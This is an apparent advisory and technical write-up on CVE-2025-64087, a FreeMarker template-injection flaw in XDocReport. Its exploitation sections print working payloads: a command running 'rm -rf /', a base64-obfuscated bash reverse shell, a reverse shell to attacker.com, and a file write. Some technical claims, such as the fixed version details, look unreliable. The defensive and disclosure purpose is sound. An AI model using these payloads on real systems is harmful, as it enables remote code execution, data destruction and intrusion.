CVE-2025-64087
CVE-2025-64087
Weakness (CWE)
CVSS Vector
v3.1- Attack Vector
- Network
- Attack Complexity
- Low
- Privileges Required
- None
- User Interaction
- None
- Scope
- Unchanged
- Confidentiality
- High
- Integrity
- High
- Availability
- High
Description
A Server-Side Template Injection (SSTI) vulnerability in the FreeMarker component of opensagres XDocReport v1.0.0 to v2.1.0 allows attackers to execute arbitrary code via injecting crafted template expressions.
Comprehensive Technical Analysis of CVE-2025-64087 (FreeMarker SSTI in XDocReport)
1. Vulnerability Assessment and Severity Evaluation
CVE ID: CVE-2025-64087 Vulnerability Type: Server-Side Template Injection (SSTI) Affected Component: FreeMarker template engine (embedded in opensagres XDocReport) CVSS Score: 9.8 (Critical) (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
Severity Justification
- Attack Vector (AV:N): Exploitable remotely over a network without authentication.
- Attack Complexity (AC:L): Low complexity; no special conditions required.
- Privileges Required (PR:N): No privileges needed; unauthenticated exploitation possible.
- User Interaction (UI:N): No user interaction required.
- Scope (S:U): Impact confined to the vulnerable component (FreeMarker in XDocReport).
- Confidentiality (C:H), Integrity (I:H), Availability (A:H): Full system compromise possible via arbitrary code execution (ACE).
This vulnerability is critical due to its remote, unauthenticated, and low-complexity exploitation leading to full system compromise.
2. Potential Attack Vectors and Exploitation Methods
Root Cause
The vulnerability stems from improper sanitization of user-supplied input in FreeMarker template expressions within XDocReport (v1.0.0–v2.1.0). Attackers can inject malicious FreeMarker template expressions that are executed server-side, leading to arbitrary code execution (ACE).
Exploitation Steps
-
Identify Vulnerable Endpoint:
- XDocReport processes user-controlled template inputs (e.g., document generation, report templates).
- Attackers locate endpoints where FreeMarker templates are dynamically evaluated (e.g.,
/generate-report,/template-render).
-
Craft Malicious Payload:
- FreeMarker allows expression evaluation (e.g.,
${7*7}→49). - Attackers inject arbitrary Java code via FreeMarker’s
freemarker.template.utility.Executeorfreemarker.template.utility.ObjectConstructorclasses. - Example payload:
<#assign ex = "freemarker.template.utility.Execute"?new()>${ex("id")}- Executes the
idcommand on the server.
- Executes the
- FreeMarker allows expression evaluation (e.g.,
-
Deliver Payload:
- Via HTTP request parameters, file uploads, or API inputs where XDocReport processes templates.
- Example attack vector:
POST /generate-report HTTP/1.1 Content-Type: application/json { "template": "<#assign ex = \"freemarker.template.utility.Execute\"?new()>${ex(\"rm -rf /\")}" }
-
Achieve Remote Code Execution (RCE):
- If successful, the server executes the injected command (e.g., reverse shell, data exfiltration, lateral movement).
Proof-of-Concept (PoC) References
3. Affected Systems and Software Versions
| Software | Affected Versions | Fixed Versions | Notes |
|---|---|---|---|
| opensagres XDocReport | v1.0.0 – v2.1.0 | v2.1.1+ | Embeds FreeMarker 2.x (vulnerable to SSTI) |
| FreeMarker | All versions < 2.3.32 | 2.3.32+ | Upstream fix available |
Detection Methods
- Static Analysis:
- Check for FreeMarker template processing in XDocReport configurations.
- Look for
freemarker.template.Configurationusage in code.
- Dynamic Analysis:
- Fuzz input fields with FreeMarker expressions (e.g.,
${7*7}). - Monitor for unexpected command execution (e.g.,
id,whoami).
- Fuzz input fields with FreeMarker expressions (e.g.,
4. Recommended Mitigation Strategies
Immediate Actions
-
Upgrade XDocReport:
- Apply XDocReport v2.1.1+ (includes FreeMarker 2.3.32+).
- If unable to upgrade, patch FreeMarker separately (ensure version ≥ 2.3.32).
-
Input Sanitization:
- Disable FreeMarker’s
ExecuteandObjectConstructorin template processing:Configuration cfg = new Configuration(Configuration.VERSION_2_3_32); cfg.setNewBuiltinClassResolver(TemplateClassResolver.SAFER_RESOLVER); - Whitelist allowed template directives (e.g., restrict
${...}syntax).
- Disable FreeMarker’s
-
Network-Level Protections:
- WAF Rules: Block requests containing FreeMarker-specific syntax (e.g.,
${,#{,?new()). - Rate Limiting: Prevent brute-force template injection attempts.
- WAF Rules: Block requests containing FreeMarker-specific syntax (e.g.,
-
Least Privilege Principle:
- Run XDocReport in a sandboxed environment (e.g., Docker with
no-new-privileges). - Restrict file system and network access for the application.
- Run XDocReport in a sandboxed environment (e.g., Docker with
Long-Term Recommendations
- Code Review: Audit all template processing logic for SSTI risks.
- Dependency Scanning: Use OWASP Dependency-Check or Snyk to detect vulnerable FreeMarker versions.
- Runtime Protection: Deploy RASP (Runtime Application Self-Protection) to block SSTI attempts.
5. Impact on the Cybersecurity Landscape
Exploitation Risks
- Mass Exploitation Potential: Given the low complexity and remote exploitability, this vulnerability is highly attractive to threat actors (e.g., ransomware groups, APTs).
- Supply Chain Risk: XDocReport is used in document generation workflows (e.g., PDF/Word reports), making it a lucrative target for data exfiltration.
- Lateral Movement: Successful exploitation could lead to privilege escalation and persistence in enterprise environments.
Industry Response
- CISA Alert: Likely to be added to the Known Exploited Vulnerabilities (KEV) Catalog if active exploitation is observed.
- Vendor Patches: opensagres has released v2.1.1 with FreeMarker security updates.
- Threat Intelligence: Security teams should monitor for exploitation attempts in web logs (e.g., unusual FreeMarker syntax in HTTP requests).
6. Technical Details for Security Professionals
FreeMarker SSTI Exploitation Deep Dive
Vulnerable Code Path
-
XDocReport Template Processing:
- XDocReport uses FreeMarker to dynamically render templates (e.g., for PDF/Word generation).
- User input is directly passed to FreeMarker’s
Template.process()without sanitization.
-
FreeMarker’s Dangerous Features:
ExecuteUtility: Allows arbitrary command execution via${"freemarker.template.utility.Execute"?new()("id")}.ObjectConstructor: Enables instantiation of arbitrary classes (e.g.,${"java.lang.Runtime"?new().exec("calc")}).
Exploitation Bypass Techniques
- Obfuscation:
- Attackers may encode payloads (e.g., Base64, URL encoding) to evade WAFs.
- Example:
<#assign ex = "freemarker.template.utility.Execute"?new()>${ex("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xMC4xMC80NDQ0IDA+JjE=}|{base64,-d}|{bash,-i}")}
- Alternative Payloads:
- File Write:
${"freemarker.template.utility.ObjectConstructor"?new()("java.io.FileWriter", "/tmp/pwned").write("malicious")} - Reverse Shell:
${"freemarker.template.utility.Execute"?new()("bash -i >& /dev/tcp/attacker.com/4444 0>&1")}
- File Write:
Post-Exploitation Impact
- Data Exfiltration: Read sensitive files (
/etc/passwd, database configs). - Persistence: Deploy web shells (e.g., JSP, PHP) via file write.
- Lateral Movement: Use RCE to pivot to other internal systems.
Detection & Forensics
- Log Analysis:
- Look for FreeMarker syntax in HTTP requests (e.g.,
${,#{,?new()). - Monitor for unexpected command execution (e.g.,
id,whoami,curl,wget).
- Look for FreeMarker syntax in HTTP requests (e.g.,
- Memory Forensics:
- Check for suspicious Java processes (e.g.,
Runtime.exec()calls).
- Check for suspicious Java processes (e.g.,
- Network Traffic:
- Detect outbound connections from the server (e.g., reverse shells).
Hardening FreeMarker
- Disable Dangerous Built-ins:
cfg.setNewBuiltinClassResolver(TemplateClassResolver.SAFER_RESOLVER); - Use a Custom
TemplateClassResolver:cfg.setNewBuiltinClassResolver(new TemplateClassResolver() { @Override public Class<?> resolve(String className, Environment env, Template template) throws ClassNotFoundException { throw new ClassNotFoundException("Class loading disabled for security"); } }); - Enable FreeMarker Security Sandbox:
cfg.setObjectWrapper(new DefaultObjectWrapperBuilder(Configuration.VERSION_2_3_32).build());
Conclusion
CVE-2025-64087 is a critical SSTI vulnerability in XDocReport’s FreeMarker component, enabling unauthenticated RCE with a CVSS score of 9.8. Organizations using XDocReport v1.0.0–v2.1.0 must immediately upgrade or apply mitigation controls (input sanitization, WAF rules, least privilege).
Security teams should: ✅ Patch affected systems (XDocReport ≥ v2.1.1). ✅ Audit template processing logic for SSTI risks. ✅ Monitor for exploitation attempts in logs. ✅ Implement runtime protections (RASP, WAF).
Given the high exploitability and severe impact, this vulnerability poses a significant risk to enterprises and should be treated as a top priority for remediation.